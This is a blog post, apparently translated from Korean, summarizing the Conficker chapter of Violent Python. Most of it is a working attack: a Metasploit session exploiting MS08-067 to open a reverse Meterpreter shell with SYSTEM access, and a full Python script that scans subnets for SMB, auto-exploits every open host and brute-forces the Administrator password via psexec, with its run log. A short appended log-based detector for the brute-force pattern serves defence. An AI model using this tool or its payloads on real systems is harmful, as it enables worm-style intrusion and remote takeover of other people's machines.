Violent Python (Korean edition: 해커의 언어, 치명적 파이썬) – CHAPTER 2 Penetration Testing – Conficker, Trying Hard Is Enough


Notice: If this material raises copyright or similar issues, I will delete it immediately.
If it is used for malicious purposes rather than for research, all legal responsibility that may arise lies with the person using it.


2.5 Conficker, Trying Hard Is Enough
Conficker – http://blog.naver.com/younjun2000?Redirect=Log&logNo=150046319543
– The worm called Conficker, or W32DownadUp, infected 5 million computers in some 200 countries
– At its core Conficker uses techniques similar to the attack vectors the Morris worm used (two vectors are combined)
1. A zero-day vulnerability in Windows Server (corrupt the stack to run shellcode, then download a copy of itself onto the infected host)
2. A brute-force attack against the default administrator network share (ADMIN$) account

2.5.1 Attacking the Windows SMB service with Metasploit
– using ms08_067_netapi

root@bt:~# msfconsole
...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.110.129
RHOST => 192.168.110.129
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set LHOST 192.168.110.133
LHOST => 192.168.110.133
msf  exploit(ms08_067_netapi) > set LPORT 7777
LPORT => 7777
msf  exploit(ms08_067_netapi) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.110.133:7777 
msf  exploit(ms08_067_netapi) > 
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.110.129
[*] Meterpreter session 1 opened (192.168.110.133:7777 -> 192.168.110.129:1157) at 2013-08-21 15:10:36 +0900

msf  exploit(ms08_067_netapi) > sessions

Active sessions
===============
  Id  Type                   Information                Connection
  --  ----                   -----------                ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SDS  192.168.110.133:7777 -> 192.168.110.129:1157 (192.168.110.129)

msf  exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 
meterpreter > execute -i -f cmd.exe
Process 2364 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter ???? ???? ???? 2:
	Connection-specific DNS Suffix  . : localdomain
	IP Address. . . . . . . . . . . . : 192.168.110.129
	Subnet Mask . . . . . . . . . . . : 255.255.255.0
	Default Gateway . . . . . . . . . : 192.168.110.2

C:\WINNT\system32>

2.5.2 Integrating Metasploit with Python
– Doing this by hand against many servers is hard, so write it in Python
1. Scan whether the SMB protocol port (TCP 445) is open (using nmap-python)
2. Create a Metasploit resource file and use it to attack the vulnerable hosts
3. Use Meterpreter, Metasploit's dynamic payload
4. Set up the multi/handler listener... I don't really understand what this means.. ㅠ
5. Finally, order the attack with exploit -j (run it in the context of a job) -z (do not interact with the job immediately)

2.5.3 Attacking with remote process execution
– Write an smbBrute function that brute-forces SMB username/password combinations
– The smbBrute function creates a Metasploit configuration file for each password and attacks with it

2.5.4 Putting the Conficker code together

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Python 2 code, as printed in the book (print statements, optparse).
import os
import optparse
import sys
import nmap

def findTgts(subNet):
    # Scan the given subnet for hosts with TCP 445 (SMB) open, using python-nmap
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet, '445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            if state == 'open':
                print '[+] Found Target Host: ' + host
                tgtHosts.append(host)
    return tgtHosts

def setupHandler(configFile, lhost, lport):
    # Write the multi/handler listener block that receives the reverse Meterpreter
    # connections; DisablePayloadHandler stops each later exploit from starting its own
    configFile.write('use exploit/multi/handler\n')
    configFile.write('set payload windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')
    configFile.write('exploit -j -z\n')
    configFile.write('setg DisablePayloadHandler 1\n')

def confickerExploit(configFile,tgtHost,lhost,lport):
    # Write the ms08_067_netapi block for one target host (Conficker's first vector)
    configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
    configFile.write('set RHOST ' + str(tgtHost) + '\n')
    configFile.write('set payload windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')
    configFile.write('exploit -j -z\n')


def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
    # Write one psexec block per password in the file, all for the Administrator
    # account (Conficker's second vector: brute-forcing the ADMIN$ share)
    username = 'Administrator'
    pF = open(passwdFile, 'r')
    for password in pF.readlines():
        password = password.strip('\n').strip('\r')
        configFile.write('use exploit/windows/smb/psexec\n')
        configFile.write('set SMBUser ' + str(username) + '\n')
        configFile.write('set SMBPass ' + str(password) + '\n')
        configFile.write('set RHOST ' + str(tgtHost) + '\n')
        configFile.write('set payload windows/meterpreter/reverse_tcp\n')
        configFile.write('set LPORT ' + str(lport) + '\n')
        configFile.write('set LHOST ' + lhost + '\n')
        configFile.write('exploit -j -z\n')
    pF.close()

def main():
    # All blocks are appended to a single resource file, meta.rc
    configFile = open('meta.rc', 'w')

    parser = optparse.OptionParser('[-] Usage %prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address[es]')
    parser.add_option('-p', dest='lport', type='string', help='specify the listen port')
    parser.add_option('-l', dest='lhost', type='string', help='specify the listen address')
    parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')

    (options, args) = parser.parse_args()

    if (options.tgtHost == None) | (options.lhost == None):
        print parser.usage
        exit(0)

    lhost = options.lhost
    lport = options.lport
    if lport == None:
        lport = '1337'
    passwdFile = options.passwdFile
    tgtHosts = findTgts(options.tgtHost)

    # Listener first, then one exploit block (and optional brute-force blocks) per host
    setupHandler(configFile, lhost, lport)

    for tgtHost in tgtHosts:
        confickerExploit(configFile, tgtHost, lhost, lport)
        if passwdFile != None:
            smbBrute(configFile,tgtHost,passwdFile,lhost,lport)

    configFile.close()
    # Hand the finished resource file to msfconsole, which replays it line by line
    os.system('msfconsole -r meta.rc')

if __name__ == '__main__':
    main()

Execution result

# python conficker.py -H 192.168.110.129 -l 192.168.110.133 -p 7777 -F userpass.txt 
[+] Found Target Host: 192.168.110.129
...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing meta.rc for ERB directives.
resource (meta.rc)> use exploit/multi/handler
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Exploit running as background job.
resource (meta.rc)> setg DisablePayloadHandler 1
DisablePayloadHandler => 1
resource (meta.rc)> use exploit/windows/smb/ms08_067_netapi
[*] Started reverse handler on 192.168.110.133:7777 
[*] Starting the payload handler...
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (meta.rc)> set SMBPass administrator:password
SMBPass => administrator:password
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Automatically detecting the target...
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass admin:12345
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => admin:12345
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (meta.rc)> set SMBPass root:secret
[*] Connecting to the server...
SMBPass => root:secret
resource (meta.rc)> set RHOST 192.168.110.129
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass guest:guest
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean
[*] Selected Target: Windows 2000 Universal
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => guest:guest
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
[*] Attempting to trigger the vulnerability...
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass root:toor
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => root:toor
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
[*] Sending stage (752128 bytes) to 192.168.110.129
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.

[*] Connecting to the server...
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
msf  exploit(psexec) > [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Meterpreter session 1 opened (192.168.110.133:7777 -> 192.168.110.129:1184) at 2013-08-21 17:14:36 +0900
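From the defender's side, the psexec brute force in the transcript above leaves a recognisable trace on the target: a burst of STATUS_LOGON_FAILURE results for Administrator from one source, followed by a successful logon once the right password is reached. The detector below is an added example, not code from the book or from this post; the log line layout, the sample lines, the event IDs used and the thresholds are constructed assumptions.

```python
# Added example (not from the book or the post): flag the SMB brute-force pattern
# produced by smbBrute, run over constructed Windows Security log lines.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real captured data). Layout is an assumption:
# "<timestamp> <EventID> <Account> <SourceIP> <Status>". 4625 = failed logon,
# 4624 = successful logon; 0xC000006D is NTSTATUS STATUS_LOGON_FAILURE.
SAMPLE_LOG = """\
2013-08-21T17:14:20 4625 Administrator 192.168.110.133 0xC000006D
2013-08-21T17:14:22 4625 Administrator 192.168.110.133 0xC000006D
2013-08-21T17:14:24 4625 Administrator 192.168.110.133 0xC000006D
2013-08-21T17:14:26 4625 Administrator 192.168.110.133 0xC000006D
2013-08-21T17:14:30 4624 Administrator 192.168.110.133 0x0
2013-08-21T17:20:00 4625 Administrator 192.168.110.50 0xC000006D
2013-08-21T17:14:21 4624 jdoe 192.168.110.77 0x0
"""

LINE_RE = re.compile(r'^(\S+) (\d+) (\S+) (\S+) (\S+)$')

def parse_log(text):
    """Return (time, event_id, account, source_ip) tuples in time order; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, eid, account, src, _status = m.groups()
        events.append((datetime.fromisoformat(ts), int(eid), account, src))
    return sorted(events)

def detect_smb_brute(text, threshold=3, window=timedelta(minutes=5)):
    """Flag (source_ip, account) pairs with >= threshold failed logons inside `window`,
    and upgrade the alert if a success from the same source follows the burst."""
    events = parse_log(text)
    failures = defaultdict(list)
    alerts = {}
    for ts, eid, account, src in events:
        key = (src, account)
        if eid == 4625:
            # sliding window: keep only failures that are still within `window` of now
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold and key not in alerts:
                alerts[key] = 'brute-force'
        elif eid == 4624 and key in alerts:
            alerts[key] = 'brute-force-then-success'
    return alerts
```

Run it against a real Security log export by adapting LINE_RE to that export's field order; the brute-force-then-success verdict is the one that warrants immediate containment of the source host.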
